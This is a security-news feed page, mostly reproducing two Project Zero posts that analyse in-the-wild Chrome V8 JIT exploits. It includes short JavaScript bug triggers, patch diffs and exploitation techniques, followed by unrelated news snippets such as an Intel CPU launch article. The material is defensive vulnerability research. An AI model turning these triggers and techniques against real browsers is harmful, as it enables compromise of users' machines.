Given that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state. The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker’s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.
Even though there’s evidence this vulnerability has been originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was reported to Chrome by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:
function write(begin, end, step) { for (var i = begin; i >= end; i += step) { step = end - begin; begin >>>= 805306382; } } var buffer = new ArrayBuffer(16384); var view = new Uint32Array(buffer); for (let i = 0; i < 10000; i++) { write(Infinity, 1, view[65536], 1); } |
As the reader can see, it’s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing. Given the available evidence, we’re fully confident that it was an independent discovery (sometimes referred to as a "bug collision").
Since the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn’t demonstrated, for example, a way to trigger memory corruption, it was initially considered a low-severity issue by the V8 engineers, however, after an internal discussion, the V8 team raised the severity rating to high.
In the light of the in-the-wild exploitation evidence, we decided to give the fix, which had introduced an explicit check for the NaN case, a thorough examination:
[...] const bool both_types_integer = initial_type.Is(typer_->cache_->kInteger) && increment_type.Is(typer_->cache_->kInteger); bool maybe_nan = false; // The addition or subtraction could still produce a NaN, if the integer // ranges touch infinity. if (both_types_integer) { Type resultant_type = (arithmetic_type == InductionVariable::ArithmeticType::kAddition) ? typer_->operation_typer()->NumberAdd(initial_type, increment_type) : typer_->operation_typer()->NumberSubtract(initial_type, increment_type); maybe_nan = resultant_type.Maybe(Type::NaN()); } // We only handle integer induction variables (otherwise ranges // do not apply and we cannot do anything). if (!both_types_integer || maybe_nan) { [...] |
The code makes the assumption that the loop variable may only become NaN if the sum or difference of initial and increment is NaN. At first sight, it seems like a fair assumption. The issue arises from the fact that the value of increment can be changed from inside the loop, which isn’t obvious from the exploit but demonstrated in the proof of concept sent to Chrome. The typer takes into account these changes and reflects them in increment’s computed type. Therefore, the attacker can, for example, add negative increment to i until the latter becomes -Infinity, then change the sign of increment and force the loop to produce NaN once more, as demonstrated by the code below:
var increment = -Infinity; var k = 0; for (var i = 0; i < 1; i += increment) { if (i == -Infinity) { increment = +Infinity; } if (++k > 10) { break; } } |
Thus, to “revive” the entire exploit, the attacker only needs to change a couple of lines in trigger.
The discovered variant was reported to Chrome in February along with the exploitation technique found in the exploit. This time the patch took a more conservative approach and made the function bail out as soon as the typer detects that increment can be Infinity.
[...] // If we do not have enough type information for the initial value or // the increment, just return the initial value's type. if (initial_type.IsNone() || increment_type.Is(typer_->cache_->kSingletonZero)) { return initial_type; } // We only handle integer induction variables (otherwise ranges do not // apply and we cannot do anything). Moreover, we don't support infinities // in {increment_type} because the induction variable can become NaN // through addition/subtraction of opposing infinities. if (!initial_type.Is(typer_->cache_->kInteger) || !increment_type.Is(typer_->cache_->kInteger) || increment_type.Min() == -V8_INFINITY || increment_type.Max() == +V8_INFINITY) { [...] |
Additionally, ReduceJSCreateArray was updated to always use the same value for both the length property and backing store capacity, thus rendering the reported exploitation technique useless.
Unfortunately, the new patch contained an unintended change that introduced another security issue. If we look at the source code of TypeInductionVariablePhi before the patches, we find that it checks whether the type of increment is limited to the constant zero. In this case, it assigns the type of initial to the induction variable. The second patch moved the check above the line that ensures initial is an integer. In JavaScript, however, adding or subtracting zero doesn’t necessarily preserve the type, for example:
-0 | + | 0 | => | -0 | ||
[string] | - | 0 | => | [number] | ||
[object] | + | 0 | => | [string] |
As a result, the patched function provides us with an even wider choice of possible “type confusions”.
It was considered worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected because we soon found this excellent blog post written by Jeremy Fetiveau, where he describes a way to bypass the initial bounds check elimination hardening. In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.
We find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.
Once again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:
function trigger(arg) { // Initially: // actual = 1, inferred = any var k = 0;
arg = arg | 0; // After step one: // actual = 1, inferred = [-0x80000000, 0x7fffffff]
arg = Math.min(arg, 2); // After step two: // actual = 1, inferred = [-0x80000000, 2]
arg = Math.max(arg, 1); // After step three: // actual = 1, inferred = [1, 2]
if (arg == 1) { arg = "30"; } // After step four: // actual = string{30}, inferred = [1, 2] or string{30}
for (var i = arg; i < 0x1000; i -= 0) { if (++k > 1) { break; } } // After step five: // actual = number{30}, inferred = [1, 2] or string{30}
i += 1; // After step six: // actual = 31, inferred = [2, 3]
i >>= 1; // After step seven: // actual = 15, inferred = 1
i += 2; // After step eight: // actual = 17, inferred = 3
i >>= 1; // After step nine: // actual = 8, inferred = 1 var array = [0.1, 0.1, 0.1, 0.1]; return [array[i], array]; } |
The mismatch between the number 30 and string “30” occurs in step five. The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn’t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.
Soon after we had identified the regression, the V8 team landed a patch that removed the vulnerable code branch. They also took a number of additional hardening measures, for example:
Furthermore, the V8 engineers have been working on a feature that allows TurboFan to insert runtime type checks into generated code. The feature should make fuzzing for typer issues much more efficient.
This blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and, quite often even the slightest issue in the typer is enough to build a powerful and reliable exploit.
Also, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we’ve discovered a rather sophisticated attacker who has exploited a vulnerability in the class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there’s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.
This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 3: Chrome Exploits.
Published: 2021-01-12 17:36:00
Popularity: 9
Author: Ryan
This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Posted by Sergei Glazunov, Project Zero
As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.
All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still exploited in real-world attacks against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.
The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process.
This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:
global_array = [, 1.1];
function trigger(local_array) { var temp = global_array[0]; local_array[1] = {}; return global_array[1]; }
trigger([, {}]); trigger([, 1.1]);
for (var i = 0; i < 10000; i++) { trigger([, {}]); }
print(trigger(global_array)); |
The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function.
The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.
The issue was reported to Chrome by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. The fix made made the alias analyser use the constant comparison only when both arguments are constants:
HAliasing Query(HValue* a, HValue* b) { [...] // Constant objects can be distinguished statically. - if (a->IsConstant()) { + if (a->IsConstant() && b->IsConstant()) { return a->Equals(b) ? kMustAlias : kNoAlias; } return kMayAlias; |
The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.
The author of the exploit takes a known approach to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.
The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.
The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker.
However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.
The second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.
The general approach is similar, however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.
While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public proof-of-concept.
This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:
'use strict'; (function() { var popped;
function trigger(new_target) { function inner(new_target) { function constructor() { popped = Array.prototype.pop.call(array); } var temp = array[0]; return Reflect.construct(constructor, arguments, new_target); }
inner(new_target); }
var array = new Array(0, 0, 0, 0, 0);
for (var i = 0; i < 20000; i++) { trigger(function() { }); array.push(0); }
var proxy = new Proxy(Object, { get: () => (array[4] = 1.1, Object.prototype) });
trigger(proxy); print(popped); }()); |
A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.
Note that the attacker can’t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.
This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was reported to Chrome under the 7-day deadline. The one-line patch modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:
InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe( [...] InferReceiverMapsResult result = kReliableReceiverMaps; [...] case IrOpcode::kJSCreate: { if (IsSame(receiver, effect)) { base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver); if (initial_map.has_value()) { *maps_return = ZoneHandleSet<Map>(initial_map->object()); return result; } // We reached the allocation of the {receiver}. return kNoReceiverMaps; } + result = kUnreliableReceiverMaps; // JSCreate can have side-effect. break; } [...] |
The reader can refer to the blog post published by Exodus Intel for more details on the issue and their version of the exploit.
This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.
The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.
The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive'' garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private symbols, owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.
The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.
Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.
The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.
The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:
jit_detector[Symbol.toPrimitive] = function() { var stack = (new Error).stack; if (stack.indexOf("Number (") == -1) { jit_detector.is_compiled = true; } }; function trigger(array, proxy) { if (!jit_detector.is_compiled) { Number(jit_detector); } [...] |
During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.
The exploit was broken in Chrome 64 by the change that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.
After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, another commit landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:
function trigger(new_target) { function inner(new_target) { popped = array.pop( Reflect.construct(function() { }, arguments, new_target)); }
inner(new_target); } |
By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.
The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.
The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.
This version targets Chrome 68-72. It was broken by the commit that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.
The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author.
Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.
The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.
The public exploit presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the pointer compression feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.
CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.
Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the previous post.
In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:
oob_index = 100000;
function trigger() { let array = [1.1, 1.1];
let index = arguments.length; index = index - 65534; index = Math.max(index, 0);
return array[index] = 2.2; }
for (let i = 0; i < 20000; i++) { trigger(1,2,3); }
print(trigger.apply(null, new Array(65534 + oob_index))); |
Qixun Zhao used the same vulnerability in Tianfu Cup and reported it to Chrome in November 2018. The public report includes a renderer exploit. The fix, which landed in Chrome 72, simply relaxed the range of the length property.
The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.
Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.
As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that one of the hardening patches against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with site isolation; hence, the public exploit, which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.
The public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known since at least 2017. The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.
This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:
for (var i = -Infinity; i < 0; i += Infinity) { [...] } |
This vulnerability and exploit for Chrome 73-79 have been discussed in detail in the previous blog post. There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.
The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.
It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.
The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.
It is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.
The area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.
This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 4: Android Exploits.
Published: 2020-08-01 01:04:41
Popularity: None
Author: Ryan Hughes
A Tampa teenager is in jail, accused of being the “mastermind” behind a hack on the social media website Twitter that caused limited access to the site and high-profile accounts, accord…
...morePublished: 2019-03-07 23:23:54
Popularity: None
Author: Posted by Ryan Hurst and Gary Belvin, Security and Privacy Engineering
Posted by Ryan Hurst and Gary Belvin, Security and Privacy Engineering Encryption is a foundational technology for the web. We’ve spent a l...
...morePublished: 2019-03-07 23:01:44
Popularity: None
Author: Posted by Oliver Chang, Abhishek Arya (Security Engineers, Chrome Security), Kostya Serebryany (Software Engineer, Dynamic Tools), and Josh Armour (Security Program Manager)
Posted by Oliver Chang, Abhishek Arya (Security Engineers, Chrome Security), Kostya Serebryany (Software Engineer, Dynamic Tools), and Josh ...
...morePublished: 2019-03-07 22:49:45
Popularity: None
Author: Brett Howse, Ryan Smith
In an unusual set of circumstances (ed: someone couldn't follow a simple embargo), this evening Intel is officially announcing its 8th Generation desktop CPU lineup, codenamed Coffee Lake. This comes roughly a week and a half ahead of its originally planned launch date (and still the shipping date) of October 5th. We’ve already seen part of the 8th Generation announced – the "Kaby Lake Refresh" based mobile parts – which included a bump in core counts for some of the formerly dual-core U-series processors, upgrading them to quad-core processors with HyperThreading. Meanwhile on the desktop side, there’s been some news that’s already found its way out, and as usual, some rumors as well. But tonight, Intel is finally and officially taking the wraps off of their latest lineup of desktop CPUs, along with the associated Z370 chipset.
Although there’s a lot of new enhancements coming to the party, arguably the biggest one for most people is that Intel has finally expanded the core counts across the range, which is something they’ve not done on non HEDT systems since they originally went to quad-cores with the Core 2 Extreme QX6700, way back in 2006. If you wanted more Intel cores than four previous to now, you’d have to move to HEDT, but no longer. Core i7 is moving to six cores with HyperThreading, Core i5 is moving to six cores, and Core i3 is moving to four cores.
Basic Specifications of Intel Core i5/i7 Desktop CPUs | |||||||||||
7th Generation | 8th Generation | ||||||||||
CPU | Cores | Freq. (Base) | Freq. (Boost) | L3 | TDP | CPU | Cores | Freq. (Base) | Freq. (Boost) | L3 | TDP |
i7-7700K ($339) | 4/8 | 4.2GHz | 4.5GHz | 8 MB | 91W | i7-8700K ($359) | 6/12 | 3.7GHz | 4.7GHz | 12 MB | 95W |
i7-7700 ($303) | 3.6GHz | 4.2GHz | 65W | i7-8700 ($303) | 3.2GHz | 4.6GHz | 65W | ||||
i5-7600K ($242) | 4/4 | 3.8GHz | 4.2GHz | 6 MB | 91W | i5-8600K ($257) | 6/6 | 3.6GHz | 4.3GHz | 9 MB | 95W |
i5-7400 ($182) | 3.0GHz | 3.5GHz | 65W | i5-8400 ($182) | 2.8GHz | 4.0GHz | 65W | ||||
i3-7350K ($168) | 2/4 | 4.2GHz | NA | 4 MB | 60W | i3-8350K ($168) | 4/4 | 4.0GHz | N/A | 8 MB | 91W |
i3-7100 ($117) | 3.9GHz | NA | 3 MB | 51W | i3-8100 ($117) | 3.6GHz | N/A | 6 MB | 65W |
If you’ve got workloads that can handle more threads, the latest Coffee Lake parts should provide a significant boost in performance. We’ll have to wait for the full review to see how much of an increase this provides, but Intel is saying up to 25% more FPS and 45% better performance when “mega-tasking” compared to the Core i7-7700K. Those are fairly bold claims, so we’ll have to see how they make out, but it would not be out of the realm of possibility, especially on the “mega-tasking” where Intel is talking about gaming, plus streaming, plus recording of PlayerUnknown’s Battlegrounds, compared to the quad-core i7-7700K.
Nothing comes for free, of course, and the extra cores on the i7-8700K do push the base frequency down 500 MHz from the Kaby Lake i7-7700K, although the boost frequency is 200 MHz higher. The latter is particularly interesting, as Intel isn't using "favored cores" ala Turbo Boost Max 3.0 here. Instead, these are typical Turbo Boost 2.0 frequencies, which is to say that each and every core needs to be capable of hitting these published clockspeeds. Or put another way, if you throw TDP limits into the wind, turning on a motherboard's multi-core enhancement (or equivalent) should get you a true 4.7GHz 6-core CPU without any real overclocking. Similarly, I strongly suspect that the lower base clock is for TDP reasons, as Intel has only increased the official TDPs from 91W for the high-end 7th Gen CPUs to 95W for the 8th Gen CPUs.
Suffice it to say then, Intel is aiming for high performance levels here. This isn't something that's going to touch Intel's HEDT Skylake-X family of CPUs in heavily multi-threaded workloads simply by virtue of lower TDPs and fewer cores – though the i7-7800X has just become redundant – but instead the new hex core models in particular are going to offer Intel's fastest single-threaded performance to date, coupled with an increased number of cores. So high-end buyers will find themselves picking between fast Coffee Lake hexes, somewhat lower ST performance Skylake-X processors with 8+ cores, and of course AMD's Ryzen lineup, which has lower ST performance still, but at the high-end offers 8 to 16 Zen cores.
The downside for Intel mainstream CPU users through all of this is that prices are going up on Intel's high performance K model CPUs. Whereas the list price for a 7700K was $339, it's $359 for an 8700K, a $20 (6%) jump. Similarly, a top-end i5 has gone from $242 for the 7600K to $257 for the $8600K, a $15 (6%) price increase. And as always, keep in mind that these prices are per chip in a 1000 unit order; actual retail prices will be several percent higher still. So don't be surprised to see the 8700K closing in on $400 at retail.
Meanwhile, along with the new Coffee Lake CPUs, Intel is also announcing a new chipset to support said CPUs: Z370. Intel's specifications for motherboards require improved power delivery over the previous models, to support the higher demands of more cores. They also support DDR4-2666 memory officially now. Curiously, the slides from Intel show integrated Thunderbolt 3, which would make a lot of sense since Intel wants to promote their own standard; however the company was unable to let us know if any extra silicon would be required to enabled Thunderbolt 3 after the chipset, which was the case with the Z270. Most likely it will be, as Thunderbolt's high speeds require transceivers/redrivers close to the ports. Intel did however clarify that HDMI 2.0a will still require an extra LSPCon (Level Shifter - Protocol Converter) in the DP 1.2 path.
Intel is also promoting its Optane Memory, which is the cache version of their Optane brand. This isn’t new, and we’ve even had a chance to try out Optane Memory earlier this year. The numbers Intel quotes though are compared to an older system with a mechanical hard drive, and while Optane Memory will certainly help out there, so will moving to SSDs for your storage.
Intel is also touting the overclocking capabilities of the latest processors, which feature per-core overclocking, and other enhancements to let the end-user squeeze the last ounce of performance out of their purchase. Personally, I’m not into overclocking, so I’ll leave this section to Ian for the review.
It's hard to imagine that Intel’s Coffee Lake is quite what the company wanted to offer when drawing up their plans a couple of years ago. But with increased competition, OEMs who prefer a regular cadence they can match their own product lineups to, and most importantly the well-published delays in getting their cutting-edge 10nm manufacturing process up to par, Intel has had to stick with 14nm again. However the upshot of this is that Coffee Lake is the first CPU family coming out of Intel built on their updated 14++ process, so while it remains to be seen just how good 14++ really is, under the hood Coffee Lake is going to be at least a little bit more than just a bump in the CPU core counts.
Speaking of cores, Intel has also confirmed that relative to Kaby Lake, Coffee Lake still retains the same CPU and GPU architectures; Intel isn't rolling out any new architectural designs here. This means we're talking about Skylake CPU cores coupled with Kaby Lake GPU cores, though with what I imagine will be higher clockspeeds on the latter as well. So while Coffee Lake won't completely upend Intel's CPU stack – and this is why Intel isn't committing a massive faux pas by mixing Kaby Lake Refresh with Coffee Lake under the 8th Gen banner – a 50-100% increase in cores is hard to be upset about. The increased performance, especially in multi-threaded workloads, should help Intel in the desktop space, which is the one space where they have actual competition right now.
Source: Intel
Published: 2019-03-07 22:48:40
Popularity: None
Author: Robert McMillan and Ryan Knutson
A massive data breach at Yahoo in 2013 was far more extensive than previously disclosed, affecting all of its 3 billion user accounts, its parent company Verizon said.
...morePublished: 2019-03-07 22:44:04
Popularity: None
Author: Bryan Lunduke
You might not know it, but inside your Intel system, you have an operating system running in addition to your main OS that is raising eyebrows and concerns. It's called MINNIX.
...morePublished: 2019-03-07 22:35:34
Popularity: None
Author: Bryan Menegus
For the third time in recent months, big problems have been discovered with macOS High Sierra.
...morePublished: 2019-03-07 22:33:05
Popularity: None
Author: Bryan Menegus
